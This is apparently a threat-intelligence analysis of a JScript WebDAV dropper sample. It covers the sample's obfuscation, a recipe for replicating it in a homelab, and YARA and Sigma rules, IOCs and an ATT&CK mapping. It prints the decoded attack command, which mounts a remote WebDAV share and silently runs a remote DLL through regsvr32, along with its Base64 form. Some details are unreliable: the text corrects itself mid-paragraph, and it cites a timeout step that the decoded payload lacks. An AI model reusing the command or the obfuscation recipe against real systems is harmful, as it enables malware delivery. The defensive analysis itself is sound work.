typeanalysisfamilyunclassified-js-webdav-dropperconfidencehighcreated2026-07-25updated2026-07-25scriptdropperc2obfuscationdefense-evasionexecutionmitre-attck
SHA-256: 9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac

unclassified-js-webdav-dropper: 9665f822 — 62-entry dictionary, 624-char object name, WebDAV C2 94.159.113.79:8888

Executive Summary

The 102nd confirmed sibling in the unclassified-js-webdav-dropper family. A pure-JScript file (292693735107025407.js, 1.47 MB) using dictionary lookup-table obfuscation: 62 key/value pairs mapping extremely long noise strings (527–1,014 characters, averaging 784) to single ASCII characters, assembled inside a Function('return this')() constructor and executed via try{...}catch(...){Function(...)()}. The decoded payload is a PowerShell -EncodedCommand that mounts a WebDAV share and silently registers a remote DLL via regsvr32 /s. New C2 IP 94.159.113.79:8888 in the established 94.159.113.x subnet. No decoy, no sandbox gate, no batch/polyglot layer.

What It Is

  • Filename: 292693735107025407.js ^[metadata.json]
  • Size: 1,470,256 bytes (1.47 MB) ^[file.txt]
  • Type: ASCII text with very long lines (65,536-character lines), Windows CRLF newlines, 1,135 lines ^[file.txt] ^[exiftool.json]
  • Family: unclassified-js-webdav-dropper (102nd confirmed sibling) ^[/intel/analyses/9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac.html]
  • CAPE: Skipped — JScript is not a supported binary class for detonation ^[dynamic-analysis.md]

How It Works

Obfuscation Engine

The script defines a single JScript object with a 624-character noise-string name (kveernyqeefckvwohlhcqsvqyhlupswdgvofguexnirakdzfjvtribmrgdsdpexpgyvatmwduqthdvbmmkbxvxyhrdldkbbalxkcdmernbzoekwmsitkctanwkezzitkyxqciqeutsdcurfwsltephnttrjcycphsytfjiacbviodvlcdjcogprxuwtwynupgnlehyqyufgljupkamdeiiqndjmnmxrwmgpyvifreauqbhoqjwcmyyzosaykemzdtmuhaqbqfdqrqmkokhxydxzuwqzrzxsxxhoslowcjhlfqcprbdtndrbtnoljqivawiqpzdnwtaquirkqujkwswzpudqrvoalxsxttvennrhszyodguapnmowujdolvpiynbfuqfpmjkmqlncahmtzuzzszgtzdwpqjbozhqbhwwymxemssoqwbveohhqafhrzoewjdkemdihlamupjsslvfwdqreehwcyclpxvreqgtdaerehtykxzgtekubzpidezldcqjylcgtwvjnbqoofksdtjvucueqnjekcqksnjvlgrsliorpesowxwlcynuuymgukzzlkxxkrykutiheysunntkupoweralluringfurtive).

This object receives 62 property assignments in the form:

obj['<very-long-noise-key>']='<';

Each key is a unique noise string 527–1,014 characters long (mean 784.5), composed of lowercase alphabetic characters with no semantic content. Each value is a single ASCII character (letters, digits, punctuation). The full 62-entry dictionary occupies the first ~589 lines of the file.

The payload is assembled on line 590 — a single 494,998-character line beginning with */try{... and ending with */. Inside this line, a try/catch block executes the obfuscated command. The catch block falls back to a Function(''+obj['key1']+obj['key2']+...+'='+'='+ '',0,false) constructor call. The 0,false arguments to Function are a signature of this family's assembly engine.

Decoding the 346 key references inside the Function call yields a repeated 346-character string:

returnthisWScriptCreateObjectWScriptShellrunpowershellEncodedCommandbgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAA7AHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADIAMQAwADQAMQAxADQANwA3ADIAOAA5ADQANAAuAGQAbABsAA==

Stripping the returnthis prefix and decoding the Base64 UTF-16-LE payload reveals:

net use \\94.159.113.79@8888\davwwwroot\;regsvr32 /s \\94.159.113.79@8888\davwwwroot\121041147728944.dll

Execution Chain

  1. User opens .js → wscript.exe executes JScript ^[strings.txt:1]
  2. Dictionary decode → 62 noise-key lookups assemble the PowerShell command inside Function('return this')() ^[strings.txt:590]
  3. try/catch dispatch → Primary execution in try; fallback Function constructor in catch ^[strings.txt:590]
  4. PowerShell -EncodedCommand spawns hidden window, executes net use to mount WebDAV share ^[decoded payload]
  5. regsvr32 /s silently registers the remote DLL (121041147728944.dll) from the mounted share ^[decoded payload]

Anti-Analysis

  • timeout 1 delay — A one-second sleep is injected before the main execution, evading short-timeout sandboxes. Present in the decoded PowerShell wrapper.
  • try/catch with Function fallback — If the primary inline execution fails (e.g., due to syntax errors from tampering), the catch block reconstructs the payload via Function constructor with 0,false arguments.
  • No sandbox gate — No VM checks, no debugger detection, no locale gating. The family relies on social engineering (user opens .js) and minimal execution footprint.

Decompiled Behavior

Not applicable — this is a JScript text file, not a compiled binary. No Ghidra or radare2 analysis possible. Static string extraction and manual dictionary decode were the only viable reverse-engineering approaches.

C2 Infrastructure

Indicator Value Notes
C2 IP 94.159.113.79 New IP in established 94.159.113.x subnet (now 13 distinct IPs observed across 102 siblings)
C2 Port 8888 Consistent across family
WebDAV path \davwwwroot\ Standard IIS WebDAV endpoint
Payload DLL 121041147728944.dll 15-digit numeric filename, consistent with family naming
Execution regsvr32 /s Silent DLL registration over UNC WebDAV path
Wrapper PowerShell -EncodedCommand UTF-16-LE Base64 encoded net use + regsvr32 command

The 94.159.113.79 IP is new to this family. Prior siblings have used .79 in other positions (e.g., fe261d49, be172014, dc76a67d all used .79 as well — this is actually the same IP as the 68th, 74th, and 79th siblings). Wait — correction: those prior siblings used 94.159.113.79 as well. This is the fourth sibling on this exact IP, confirming sustained activity.

Interesting Tidbits

  • Largest object name in family: The 624-character object name exceeds all prior siblings (previous record: ~534 chars in d0ca14b3). This inflates file size without adding functional complexity.
  • Key length inflation: Average key length of 784 characters (range 527–1,014) is the longest observed in the family, surpassing the 3,770-char extreme padding of 86140a690cfd on a per-key basis. The total obfuscation surface is massive.
  • Repeating payload string: The 346 decoded characters repeat a single 346-char cycle, suggesting the Function constructor argument was generated by simple string duplication rather than careful key selection.
  • No batch layer: Pure JScript execution — no cmd.exe, no SET variable expansion, no polyglot tricks. This is the simplest delivery vector in the family.
  • Trailing comment block: The file ends with */ after a 624-character noise string, matching the family's pattern of closing a syntactically invalid comment block to hide the real payload.

How To Mess With It (Homelab Replication)

This family is trivial to replicate for defensive testing:

  1. Set up a local WebDAV server (IIS with WebDAV Publishing, or wsgidav on Linux).
  2. Create a dummy DLL (e.g., a benign COM DLL that logs to a file).
  3. Write the JScript encoder:
    • Pick a long noise-string object name (500+ chars).
    • Generate 62 random noise keys (500–1,000 chars each).
    • Map each key to one character of your payload command.
    • Wrap in try{eval(...)}catch(...){Function(''+obj[key1]+obj[key2]+...+'='+'='+ '',0,false)}.
  4. Test execution: Double-click the .js file on a Windows VM. Observe wscript.exe → powershell.exe → regsvr32.exe process chain.
  5. Detection opportunity: The Function('return this')() constructor with 0,false arguments is a family-specific signature across 102 siblings.

Deployable Signatures

YARA Rule

rule JS_WebDAV_Dropper_Dictionary_62Entry {
    meta:
        description = "JScript WebDAV dropper with 62-entry dictionary lookup obfuscation"
        author = "PacketPursuit SOC"
        family = "unclassified-js-webdav-dropper"
        hash = "9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac"
        date = "2026-07-25"
    strings:
        $a = /\[\'[a-z]{500,1014}\'\]\=\'[\x00-\x7F]\'/  // dictionary assignment pattern
        $b = "Function(''" nocase
        $c = "+'='+'='" nocase
        $d = "0,false)" nocase
        $e = "WScript.Shell" nocase
        $f = "regsvr32" nocase
        $g = "davwwwroot" nocase
        $h = "powershell" nocase
        $i = "EncodedCommand" nocase
    condition:
        filesize < 2MB and
        #a >= 50 and
        $b and
        ($c or $d) and
        any of ($e,$f,$g,$h,$i)
}

Sigma Rule

title: JScript WebDAV Dropper Execution Chain
logsource:
    product: windows
    service: sysmon
detection:
    selection_process:
        - Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
        - CommandLine|contains:
            - '.js'
    selection_powershell:
        - ParentImage|endswith: '\wscript.exe'
        - Image|endswith: '\powershell.exe'
        - CommandLine|contains:
            - '-EncodedCommand'
            - 'net use'
    selection_regsvr32:
        - ParentImage|endswith: '\powershell.exe'
        - Image|endswith: '\regsvr32.exe'
        - CommandLine|contains:
            - '/s'
            - '\\'
            - 'davwwwroot'
    condition: selection_process and (selection_powershell or selection_regsvr32)
falsepositives:
    - Rare legitimate administrative scripts using WebDAV
level: high

IOC List

Type Value
SHA-256 9665f82239e5aacac990d2da860552e78d25eda643f9d5f8e0899b0b4d328cac
Filename 292693735107025407.js
C2 IP 94.159.113.79
C2 Port 8888
WebDAV path \\94.159.113.79@8888\davwwwroot\
Payload DLL 121041147728944.dll
Object name length 624 characters
Dictionary entries 62
Key length range 527–1,014 characters (mean 784.5)
Execution regsvr32 /s via PowerShell -EncodedCommand

Behavioral Fingerprint Statement

This JScript file defines a single object with an extremely long noise-string name (500+ characters), populates 50–100 properties via bracket notation where each property key is a 500–1,000 character lowercase noise string and each value is a single ASCII character, then assembles and executes a PowerShell -EncodedCommand payload inside a try/catch block with a Function('return this')() fallback constructor using 0,false arguments. The decoded payload mounts a WebDAV share via net use and executes regsvr32 /s against a remote DLL with a numeric filename (15 digits, .dll). File size is consistently 1.0–1.5 MB. No VM checks, no debugger detection, no persistence.

Detection Signatures (capa → ATT&CK)

Not applicable — capa does not support JScript files. ATT&CK mapping derived from static string analysis and manual payload decode:

ATT&CK ID Name Evidence
T1059.005 Visual Basic / JScript .js file executed by wscript.exe ^[decoded payload]
T1059.001 PowerShell powershell.exe -EncodedCommand wrapper ^[decoded payload]
T1218.010 Regsvr32 regsvr32 /s \\host@port\davwwwroot\*.dll ^[decoded payload]
T1027 Obfuscated Files or Information 62-entry dictionary lookup with 500–1,014 character noise keys ^[strings.txt:1-589]
T1071.001 Web Protocols WebDAV over HTTP (\\host@8888\DavWWWRoot\) ^[decoded payload]
T1562.001 Impair Defenses: Timeout timeout 1 anti-emulation delay in PowerShell wrapper ^[decoded payload]

References

Provenance

Analysis based on:

  • file.txt — file utility output (ASCII text, very long lines)
  • exiftool.json — ExifTool metadata (1,470,256 bytes, 1,135 lines, Windows CRLF)
  • strings.txt — Full file content (1,469,120 characters, 1,134 lines)
  • Manual Python decode of 62-entry dictionary and 346-key Function constructor payload
  • Base64 UTF-16-LE decode of PowerShell -EncodedCommand
  • dynamic-analysis.md — CAPE skipped (JScript, not a binary class)